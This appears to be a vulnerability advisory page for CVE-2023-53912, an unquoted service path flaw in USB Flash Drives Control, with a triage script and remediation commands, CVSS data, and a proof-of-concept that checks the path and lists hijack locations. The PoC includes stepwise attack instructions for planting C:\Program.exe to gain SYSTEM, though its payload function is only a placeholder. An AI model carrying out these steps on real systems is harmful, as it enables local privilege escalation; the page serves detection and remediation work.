Security Vulnerability Report
CVE-2023-53912 CVSS 6.2 MEDIUM

CVE-2023-53912

Published: 2025-12-17 23:15:50
Last Modified: 2026-04-15 00:35:42

Description

USB Flash Drives Control 4.1.0.0 contains an unquoted service path vulnerability in its service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\USB Flash Drives Control\usbcs.exe' to inject malicious executables and escalate privileges on Windows systems.
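The probe order behind this class of bug, as an added example that is not part of the advisory, the vendor's product or the referenced exploit: the Service Control Manager starts the service through CreateProcess with the unquoted ImagePath as the command line, and CreateProcess tries each space-delimited prefix (with .exe appended) before it reaches the real binary, so for the path above it looks for C:\Program.exe, then C:\Program Files\USB.exe, and so on. The script below applies that rule to a constructed service inventory (only the usbcs.exe entry is taken from the advisory; the other service names and paths are hypothetical), skips quoted paths, and prints the sc config command that re-registers each finding with a quoted path. One caveat the advisory leaves out: a candidate is only exploitable if the attacker can create a file in that directory, and on a default Windows installation standard users cannot create files in the root of C:\ or under C:\Program Files, so confirm the ACLs (icacls) before rating a finding as exploitable.

```python
#!/usr/bin/env python3
"""Offline triage of Windows service image paths for CWE-428 (unquoted search path).

Added example for this advisory page; not code from the product vendor, from NVD
or from the referenced exploit. The inventory below is constructed: only the
usbcs.exe entry comes from the CVE-2023-53912 description, the other service
names and paths are hypothetical.
"""
import re

# Constructed inventory: service name -> ImagePath value as stored under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>. Only the first entry is real.
SERVICES = {
    "USB Flash Drives Control": r"C:\Program Files\USB Flash Drives Control\usbcs.exe",
    "QuotedSvc": r'"C:\Program Files\Quoted Vendor\svc.exe" -k netsvcs',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k LocalService",
    "ArgsSvc": r"C:\Program Files\Some Vendor\agent.exe --port 8080",
}


def split_image_path(image_path):
    """Return (executable, arguments, quoted) for an ImagePath value.

    A leading double quote delimits the executable exactly. Without quotes the
    executable is taken to end at the first '.exe' token, which is what the
    service author intended; hijack_candidates() enumerates what CreateProcess
    actually tries before getting there.
    """
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end < 0:
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    m = re.match(r"(.*?\.exe)(?:\s+(.*))?$", s, re.IGNORECASE)
    if not m:
        return s, "", False
    return m.group(1), (m.group(2) or "").strip(), False


def hijack_candidates(exe_path):
    """Files CreateProcess probes, in order, before the real executable of an
    unquoted path containing spaces: every prefix that ends at a space, with
    '.exe' appended when the prefix's last component has no extension (the
    documented CreateProcess rule). Paths without spaces yield nothing."""
    candidates = []
    for i, ch in enumerate(exe_path):
        if ch != " ":
            continue
        prefix = exe_path[:i]
        if "." not in prefix.rsplit("\\", 1)[-1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def triage(services):
    """Map each service whose executable path is unquoted and contains spaces
    to the ordered list of hijack candidates. Quoted paths and space-free
    paths are not reported."""
    findings = {}
    for name, image_path in services.items():
        exe, _args, quoted = split_image_path(image_path)
        if quoted:
            continue
        candidates = hijack_candidates(exe)
        if candidates:
            findings[name] = candidates
    return findings


def remediation(name, image_path):
    """The sc.exe command that re-registers the service with a quoted path.
    sc's parser requires the space after 'binPath='; the inner quotes are
    backslash-escaped for cmd.exe."""
    exe, args, _quoted = split_image_path(image_path)
    quoted = f'\\"{exe}\\"' + (f" {args}" if args else "")
    return f'sc config "{name}" binPath= "{quoted}"'


if __name__ == "__main__":
    for name, candidates in triage(SERVICES).items():
        print(f"[!] {name}: unquoted path, SCM would try in order:")
        for cand in candidates:
            print(f"      {cand}")
        print(f"    fix: {remediation(name, SERVICES[name])}")
```

On a live host the same functions can be fed the output of `reg query` or `Get-CimInstance Win32_Service` (PathName column); the remediation string is what to run from an elevated prompt, followed by a service restart, and the fix should be confirmed with `sc qc` showing the quoted BINARY_PATH_NAME.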

CVSS Details

CVSS 3.1 Score
6.2
Severity
MEDIUM
CVSS 3.1 Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Score
8.5
Severity
HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Both vectors come from the same secondary source in the NVD record and disagree with each other: the 3.1 vector claims no privileges required and a confidentiality-only impact, whereas the 4.0 vector (low privileges, high confidentiality, integrity and availability impact) is the one that actually describes a local user planting an executable that runs as SYSTEM. Treat the 4.0 score as the better description of the risk.

Configurations (Affected Products)

No CPE configuration data is attached to the NVD record (vulnStatus: Deferred).

USB Flash Drives Control <= 4.1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2023-53912 PoC - USB Flash Drives Control Unquoted Service Path
# This PoC checks whether the service is registered with an unquoted binary
# path containing spaces and lists the file names the Service Control Manager
# (via CreateProcess) would try before reaching usbcs.exe.
# Author: Security Researcher
# Note: This is for educational and authorized testing purposes only

import os
import re
import subprocess
import sys
import tempfile

TARGET_SERVICE = "USB Flash Drives Control"


def get_binary_path(service):
    """Return the BINARY_PATH_NAME that `sc qc` reports for the service, or None."""
    try:
        result = subprocess.run(
            ['sc', 'qc', service],
            capture_output=True,
            text=True
        )
    except OSError as e:
        print(f"[-] Error querying service: {e}")
        return None
    if result.returncode != 0:
        print(f"[-] Service '{service}' not found (sc exit code {result.returncode})")
        return None
    match = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", result.stdout)
    if not match:
        print("[-] Could not parse BINARY_PATH_NAME from sc output")
        return None
    return match.group(1).strip()


def hijack_candidates(binary_path):
    r"""
    File names CreateProcess tries, in order, for an unquoted path with spaces:
    every prefix that ends at a space, with '.exe' appended. For
    C:\Program Files\USB Flash Drives Control\usbcs.exe that is C:\Program.exe,
    C:\Program Files\USB.exe, C:\Program Files\USB Flash.exe and
    C:\Program Files\USB Flash Drives.exe. A quoted path yields no candidates.
    """
    if binary_path.startswith('"'):
        return []
    # Ignore any service arguments that follow the executable name
    end = binary_path.lower().find(".exe")
    exe_path = binary_path[:end + 4] if end != -1 else binary_path
    return [exe_path[:i] + ".exe" for i, c in enumerate(exe_path) if c == ' ']


def can_write(directory):
    r"""
    Whether the current user can create a file in directory. This is the real
    precondition for exploitation; by default C:\ and C:\Program Files deny it
    to standard users.
    """
    try:
        fd, path = tempfile.mkstemp(dir=directory)
        os.close(fd)
        os.remove(path)
        return True
    except OSError:
        return False


def check_vulnerability():
    """
    Check if the target system is vulnerable to CVE-2023-53912
    """
    binary_path = get_binary_path(TARGET_SERVICE)
    if binary_path is None:
        return False

    candidates = hijack_candidates(binary_path)
    if not candidates:
        print(f"[-] Service path is quoted or contains no spaces: {binary_path}")
        return False

    print(f"[!] VULNERABLE: Unquoted service path: {binary_path}")
    for candidate in candidates:
        writable = can_write(os.path.dirname(candidate))
        state = "writable" if writable else "not writable"
        print(f"[!] Attacker can place malicious executable at: {candidate} ({state} for this user)")
    return True


def create_payload(payload_path):
    """
    Create a simple reverse shell payload for demonstration
    In real attack, this would be a more sophisticated malware
    """
    # This is a placeholder - in real attack, attacker would create actual malware
    print(f"[*] In a real attack, malicious executable would be created at: {payload_path}")
    print("[*] When service restarts, the malicious code executes with SYSTEM privileges")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2023-53912 - USB Flash Drives Control Unquoted Service Path")
    print("=" * 60)

    if os.name != 'nt':
        print("[-] This exploit only works on Windows systems")
        sys.exit(1)

    print("\n[*] Checking for vulnerability...")
    if check_vulnerability():
        print("\n[!] Target is VULNERABLE to CVE-2023-53912")
        print("\n[*] Attack vector:")
        print("    1. Attacker places malicious Program.exe in C:\\ (requires write access to that directory)")
        print("    2. Wait for service restart or trigger restart")
        print("    3. Malicious code executes with SYSTEM privileges")
        # Demonstrate the attack path
        create_payload(r"C:\Program.exe")
    else:
        print("\n[-] Target does not appear to be vulnerable")

References

https://binisoft.org/
https://www.exploit-db.com/exploits/51508
https://www.vulncheck.com/advisories/usb-flash-drives-control-unquoted-service-path-privilege-escalation

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53912", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:49.657", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "USB Flash Drives Control 4.1.0.0 contains an unquoted service path vulnerability in its service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\USB Flash Drives Control\\usbcs.exe' to inject malicious executables and escalate privileges on Windows systems."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://binisoft.org/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51508", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/usb-flash-drives-control-unquoted-service-path-privilege-escalation", "source": "[email protected]"}]}}